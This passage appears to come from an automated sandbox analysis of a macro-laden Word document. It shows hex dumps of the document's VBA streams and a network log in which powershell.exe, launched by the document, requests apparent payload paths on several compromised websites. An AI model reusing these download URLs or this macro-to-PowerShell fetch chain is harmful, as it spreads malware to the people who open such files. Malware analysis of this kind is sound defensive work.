                                              Data Raw:78 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524
                                              General
                                              Stream Path:Macros/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:524
                                              Entropy:5.52955915132
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 9 1 6 F 7 B 9 1 - 5 D 2 F - 4 2 F E - 8 5 A 0 - A 5 1 0 E E 1 5 7 0 3 4 } " . . D o c u m e n t = A 5 g d 2 1 k l f q u 9 c 6 r s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z d j t k 4 6 n m 1 7 v o o . . M o d u l e = O w p p n p 8 h a h 4 x o 7 8 8 . . E x e N a m e 3 2 = " F b 5 d 3 b h _ _ k e _ c w 4 p 7 7 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 4 2 6 E E C 5 1 6 F E 1 A F E 1 A F E 1 A F E 1
                                              Data Raw:49 44 3d 22 7b 39 31 36 46 37 42 39 31 2d 35 44 32 46 2d 34 32 46 45 2d 38 35 41 30 2d 41 35 31 30 45 45 31 35 37 30 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38
                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149
                                              General
                                              Stream Path:Macros/PROJECTwm
                                              File Type:data
                                              Stream Size:149
                                              Entropy:3.96410774314
                                              Base64 Encoded:False
                                              Data ASCII:A 5 g d 2 1 k l f q u 9 c 6 r s . A . 5 . g . d . 2 . 1 . k . l . f . q . u . 9 . c . 6 . r . s . . . Z d j t k 4 6 n m 1 7 v o o . Z . d . j . t . k . 4 . 6 . n . m . 1 . 7 . v . o . o . . . O w p p n p 8 h a h 4 x o 7 8 8 . O . w . p . p . n . p . 8 . h . a . h . 4 . x . o . 7 . 8 . 8 . . . . .
                                              Data Raw:41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 00 41 00 35 00 67 00 64 00 32 00 31 00 6b 00 6c 00 66 00 71 00 75 00 39 00 63 00 36 00 72 00 73 00 00 00 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 00 5a 00 64 00 6a 00 74 00 6b 00 34 00 36 00 6e 00 6d 00 31 00 37 00 76 00 6f 00 6f 00 00 00 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38 38 00 4f 00 77 00 70 00 70 00 6e 00 70 00 38 00 68
                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5216
                                              General
                                              Stream Path:Macros/VBA/_VBA_PROJECT
                                              File Type:data
                                              Stream Size:5216
                                              Entropy:5.49741129349
                                              Base64 Encoded:True
                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                              Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                              Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 675
                                              General
                                              Stream Path:Macros/VBA/dir
                                              File Type:data
                                              Stream Size:675
                                              Entropy:6.39671072877
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . { . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . Q . m . . . . ! O f f i c
                                              Data Raw:01 9f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 7b 1a e4 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                              Stream Path: WordDocument, File Type: data, Stream Size: 21038
                                              General
                                              Stream Path:WordDocument
                                              File Type:data
                                              Stream Size:21038
                                              Entropy:4.09747048154
                                              Base64 Encoded:True
                                              Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . M . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . b . . . b . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 19 4d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 52 00 00 62 7f 00 00 62 7f 00 00 19 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              Timestamp                           Source Port  Dest Port  Source IP       Dest IP
                                              Jan 7, 2021 18:44:30.154597998 CET  49165        80         192.168.2.22    172.67.141.14
                                              Jan 7, 2021 18:44:30.200851917 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.201436043 CET  49165        80         192.168.2.22    172.67.141.14
                                              Jan 7, 2021 18:44:30.203901052 CET  49165        80         192.168.2.22    172.67.141.14
                                              Jan 7, 2021 18:44:30.250072002 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.344028950 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.344073057 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.344098091 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.344122887 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.344146013 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.344171047 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.344188929 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.344202042 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.344206095 CET  49165        80         192.168.2.22    172.67.141.14
                                              Jan 7, 2021 18:44:30.344218969 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.344245911 CET  49165        80         192.168.2.22    172.67.141.14
                                              Jan 7, 2021 18:44:30.344253063 CET  49165        80         192.168.2.22    172.67.141.14
                                              Jan 7, 2021 18:44:30.344265938 CET  49165        80         192.168.2.22    172.67.141.14
                                              Jan 7, 2021 18:44:30.351722956 CET  49165        80         192.168.2.22    172.67.141.14
                                              Jan 7, 2021 18:44:30.397926092 CET  80           49165      172.67.141.14   192.168.2.22
                                              Jan 7, 2021 18:44:30.448654890 CET  49166        80         192.168.2.22    172.67.158.72
                                              Jan 7, 2021 18:44:30.494857073 CET  80           49166      172.67.158.72   192.168.2.22
                                              Jan 7, 2021 18:44:30.494976997 CET  49166        80         192.168.2.22    172.67.158.72
                                              Jan 7, 2021 18:44:30.495342970 CET  49166        80         192.168.2.22    172.67.158.72
                                              Jan 7, 2021 18:44:30.541374922 CET  80           49166      172.67.158.72   192.168.2.22
                                              Jan 7, 2021 18:44:30.559907913 CET  80           49166      172.67.158.72   192.168.2.22
                                              Jan 7, 2021 18:44:30.559976101 CET  80           49166      172.67.158.72   192.168.2.22
                                              Jan 7, 2021 18:44:30.560034037 CET  80           49166      172.67.158.72   192.168.2.22
                                              Jan 7, 2021 18:44:30.560090065 CET  80           49166      172.67.158.72   192.168.2.22
                                              Jan 7, 2021 18:44:30.560107946 CET  49166        80         192.168.2.22    172.67.158.72
                                              Jan 7, 2021 18:44:30.560132027 CET  80           49166      172.67.158.72   192.168.2.22
                                              Jan 7, 2021 18:44:30.560395956 CET  49166        80         192.168.2.22    172.67.158.72
                                              Jan 7, 2021 18:44:30.743870020 CET  49167        80         192.168.2.22    209.59.139.39
                                              Jan 7, 2021 18:44:30.763811111 CET  49166        80         192.168.2.22    172.67.158.72
                                              Jan 7, 2021 18:44:30.903764963 CET  80           49167      209.59.139.39   192.168.2.22
                                              Jan 7, 2021 18:44:30.903878927 CET  49167        80         192.168.2.22    209.59.139.39
                                              Jan 7, 2021 18:44:30.904099941 CET  49167        80         192.168.2.22    209.59.139.39
                                              Jan 7, 2021 18:44:31.064183950 CET  80           49167      209.59.139.39   192.168.2.22
                                              Jan 7, 2021 18:44:31.065102100 CET  80           49167      209.59.139.39   192.168.2.22
                                              Jan 7, 2021 18:44:31.065164089 CET  80           49167      209.59.139.39   192.168.2.22
                                              Jan 7, 2021 18:44:31.065221071 CET  80           49167      209.59.139.39   192.168.2.22
                                              Jan 7, 2021 18:44:31.065274954 CET  49167        80         192.168.2.22    209.59.139.39
                                              Jan 7, 2021 18:44:31.065277100 CET  80           49167      209.59.139.39   192.168.2.22
                                              Jan 7, 2021 18:44:31.065336943 CET  80           49167      209.59.139.39   192.168.2.22
                                              Jan 7, 2021 18:44:31.065383911 CET  49167        80         192.168.2.22    209.59.139.39
                                              Jan 7, 2021 18:44:31.065413952 CET  80           49167      209.59.139.39   192.168.2.22
                                              Jan 7, 2021 18:44:31.065474987 CET  80           49167      209.59.139.39   192.168.2.22
                                              Jan 7, 2021 18:44:31.065489054 CET  49167        80         192.168.2.22    209.59.139.39
                                              Jan 7, 2021 18:44:31.065553904 CET  49167        80         192.168.2.22    209.59.139.39
                                              Jan 7, 2021 18:44:31.065936089 CET  49167        80         192.168.2.22    209.59.139.39
                                              Jan 7, 2021 18:44:31.226799965 CET  80           49167      209.59.139.39   192.168.2.22
                                              Jan 7, 2021 18:44:31.441131115 CET  49168        80         192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:31.765343904 CET  80           49168      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:31.765746117 CET  49168        80         192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:31.765779018 CET  49168        80         192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:32.090040922 CET  80           49168      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:32.090152979 CET  80           49168      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:32.292649984 CET  49168        80         192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:32.460905075 CET  49169        443        192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:32.770035028 CET  443          49169      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:32.770140886 CET  49169        443        192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:32.778253078 CET  49169        443        192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:33.087449074 CET  443          49169      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:33.087608099 CET  443          49169      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:33.087630033 CET  443          49169      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:33.087855101 CET  49169        443        192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:33.096090078 CET  49169        443        192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:33.096921921 CET  49170        443        192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:33.405308008 CET  443          49169      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:33.405762911 CET  443          49170      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:33.405915976 CET  49170        443        192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:33.406655073 CET  49170        443        192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:33.715532064 CET  443          49170      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:33.715612888 CET  443          49170      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:33.715711117 CET  443          49170      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:33.715851068 CET  49170        443        192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:33.719151020 CET  49170        443        192.168.2.22    45.130.229.91
                                              Jan 7, 2021 18:44:34.028208971 CET  443          49170      45.130.229.91   192.168.2.22
                                              Jan 7, 2021 18:44:34.041439056 CET  49171        80         192.168.2.22    210.86.239.69
                                              Jan 7, 2021 18:44:34.305519104 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.305840015 CET  49171        80         192.168.2.22    210.86.239.69
                                              Jan 7, 2021 18:44:34.306168079 CET  49171        80         192.168.2.22    210.86.239.69
                                              Jan 7, 2021 18:44:34.569840908 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.578701019 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.578767061 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.578810930 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.578849077 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.578888893 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.578948021 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.578979015 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.579030037 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.579071999 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.579102039 CET  49171        80         192.168.2.22    210.86.239.69
                                              Jan 7, 2021 18:44:34.579128027 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.579128981 CET  49171        80         192.168.2.22    210.86.239.69
                                              Jan 7, 2021 18:44:34.579134941 CET  49171        80         192.168.2.22    210.86.239.69
                                              Jan 7, 2021 18:44:34.579139948 CET  49171        80         192.168.2.22    210.86.239.69
                                              Jan 7, 2021 18:44:34.579806089 CET  49171        80         192.168.2.22    210.86.239.69
                                              Jan 7, 2021 18:44:34.843252897 CET  80           49171      210.86.239.69   192.168.2.22
                                              Jan 7, 2021 18:44:34.843312979 CET  80           49171      210.86.239.69   192.168.2.22

                                              UDP Packets

                                              Timestamp                           Source Port  Dest Port  Source IP       Dest IP
                                              Jan 7, 2021 18:44:30.075944901 CET  52197        53         192.168.2.22    8.8.8.8
                                              Jan 7, 2021 18:44:30.135895967 CET  53           52197      8.8.8.8         192.168.2.22
                                              Jan 7, 2021 18:44:30.376312971 CET  53099        53         192.168.2.22    8.8.8.8
                                              Jan 7, 2021 18:44:30.447573900 CET  53           53099      8.8.8.8         192.168.2.22
                                              Jan 7, 2021 18:44:30.576024055 CET  52838        53         192.168.2.22    8.8.8.8
                                              Jan 7, 2021 18:44:30.742572069 CET  53           52838      8.8.8.8         192.168.2.22
                                              Jan 7, 2021 18:44:31.077896118 CET  61200        53         192.168.2.22    8.8.8.8
                                              Jan 7, 2021 18:44:31.439886093 CET  53           61200      8.8.8.8         192.168.2.22
                                              Jan 7, 2021 18:44:32.096111059 CET  49548        53         192.168.2.22    8.8.8.8
                                              Jan 7, 2021 18:44:32.459737062 CET  53           49548      8.8.8.8         192.168.2.22
                                              Jan 7, 2021 18:44:33.738118887 CET  55627        53         192.168.2.22    8.8.8.8
                                              Jan 7, 2021 18:44:34.039865017 CET  53           55627      8.8.8.8         192.168.2.22

                                              DNS Queries

                                              Timestamp                           Source IP       Dest IP   Trans ID  OP Code             Name                    Type            Class
                                              Jan 7, 2021 18:44:30.075944901 CET  192.168.2.22    8.8.8.8   0x315e    Standard query (0)  wpsapk.com              A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:30.376312971 CET  192.168.2.22    8.8.8.8   0x8df5    Standard query (0)  sofsuite.com            A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:30.576024055 CET  192.168.2.22    8.8.8.8   0x7e45    Standard query (0)  veterinariadrpopui.com  A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:31.077896118 CET  192.168.2.22    8.8.8.8   0x6029    Standard query (0)  shop.elemenslide.com    A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:32.096111059 CET  192.168.2.22    8.8.8.8   0x1168    Standard query (0)  shop.elemenslide.com    A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:33.738118887 CET  192.168.2.22    8.8.8.8   0x8c10    Standard query (0)  khanhhoahomnay.net      A (IP address)  IN (0x0001)

                                              DNS Answers

                                              Timestamp                           Source IP  Dest IP       Trans ID  Reply Code    Name                    CName  Address         Type            Class
                                              Jan 7, 2021 18:44:30.135895967 CET  8.8.8.8    192.168.2.22  0x315e    No error (0)  wpsapk.com                     172.67.141.14   A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:30.135895967 CET  8.8.8.8    192.168.2.22  0x315e    No error (0)  wpsapk.com                     104.18.61.59    A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:30.135895967 CET  8.8.8.8    192.168.2.22  0x315e    No error (0)  wpsapk.com                     104.18.60.59    A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:30.447573900 CET  8.8.8.8    192.168.2.22  0x8df5    No error (0)  sofsuite.com                   172.67.158.72   A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:30.447573900 CET  8.8.8.8    192.168.2.22  0x8df5    No error (0)  sofsuite.com                   104.27.144.251  A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:30.447573900 CET  8.8.8.8    192.168.2.22  0x8df5    No error (0)  sofsuite.com                   104.27.145.251  A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:30.742572069 CET  8.8.8.8    192.168.2.22  0x7e45    No error (0)  veterinariadrpopui.com         209.59.139.39   A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:31.439886093 CET  8.8.8.8    192.168.2.22  0x6029    No error (0)  shop.elemenslide.com           45.130.229.91   A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:32.459737062 CET  8.8.8.8    192.168.2.22  0x1168    No error (0)  shop.elemenslide.com           45.130.229.91   A (IP address)  IN (0x0001)
                                              Jan 7, 2021 18:44:34.039865017 CET  8.8.8.8    192.168.2.22  0x8c10    No error (0)  khanhhoahomnay.net             210.86.239.69   A (IP address)  IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • wpsapk.com
                                              • sofsuite.com
                                              • veterinariadrpopui.com
                                              • shop.elemenslide.com
                                              • khanhhoahomnay.net
                                              • 5.2.136.90

                                              HTTP Packets

                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                              0           192.168.2.22  49165        172.67.141.14   80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp                           kBytes transferred  Direction  Data
                                              Jan 7, 2021 18:44:30.203901052 CET  0                   OUT        GET /wp-admin/v/ HTTP/1.1
                                              Host: wpsapk.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 18:44:30.344028950 CET  1                   IN         HTTP/1.1 503 Service Temporarily Unavailable
                                              Date: Thu, 07 Jan 2021 17:44:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: __cfduid=d8b7506db4f74314ae3b57f6dbe6ac1c31610041470; expires=Sat, 06-Feb-21 17:44:30 GMT; path=/; domain=.wpsapk.com; HttpOnly; SameSite=Lax
                                              X-Frame-Options: SAMEORIGIN
                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                              cf-request-id: 077f8c452100000c01080e2000000001
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8lqtZejLfOVamkn%2BPl6hy5XFK4AXo4i%2FCBAfR597ZJF%2FYROmB8JlivN9ChBG46FvwWvrvHz2D5Aw%2B35S9bfu%2FOGgNQZVyqvwo%2Bic"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 60df7cb4fe450c01-AMS
                                              Data Raw: 32 30 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 62
                                              Data Ascii: 2018<!DOCTYPE HTML><html lang="en-US"><head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <title>Just a moment...</title> <style type="text/css"> html, body {width: 100%; height: 100%; margin: 0; padding: 0;} b


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.22 | 49166 | 172.67.158.72 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 7, 2021 18:44:30.495342970 CET | 10 | OUT | GET /wp-includes/2jm3nIk/ HTTP/1.1
                                              Host: sofsuite.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 18:44:30.559907913 CET | 12 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 07 Jan 2021 17:44:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Set-Cookie: __cfduid=d01a5316175caa3b723e115a9e178dbb51610041470; expires=Sat, 06-Feb-21 17:44:30 GMT; path=/; domain=.sofsuite.com; HttpOnly; SameSite=Lax
                                              X-Frame-Options: SAMEORIGIN
                                              cf-request-id: 077f8c464300000c79aab30000000001
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MIFsTKo1m7OxHsT5HW3d0aKz%2BsoPrwOhej7TTyXhcLuVAd9NqBemOjCMPV0m1TGhoqhnMr%2BN7N8a3U2XEII28eGe8vOrlMZcZjZWsCY%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 60df7cb6dfe70c79-AMS
                                              Data Ascii: 10dd<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              2 | 192.168.2.22 | 49167 | 209.59.139.39 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 7, 2021 18:44:30.904099941 CET | 16 | OUT | GET /content/5f18Q/ HTTP/1.1
                                              Host: veterinariadrpopui.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 18:44:31.065102100 CET | 18 | IN | HTTP/1.1 500 Internal Server Error
                                              Date: Thu, 07 Jan 2021 17:44:30 GMT
                                              Server: Apache
                                              Content-Length: 7309
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              3 | 192.168.2.22 | 49168 | 45.130.229.91 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 7, 2021 18:44:31.765779018 CET | 25 | OUT | GET /wp-content/n/ HTTP/1.1
                                              Host: shop.elemenslide.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 18:44:32.090152979 CET | 25 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Thu, 07 Jan 2021 17:44:31 GMT
                                              Server: Apache
                                              Location: https://shop.elemenslide.com/wp-content/n/
                                              Content-Length: 250
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shop.elemenslide.com/wp-content/n/">here</a>.</p></body></html>


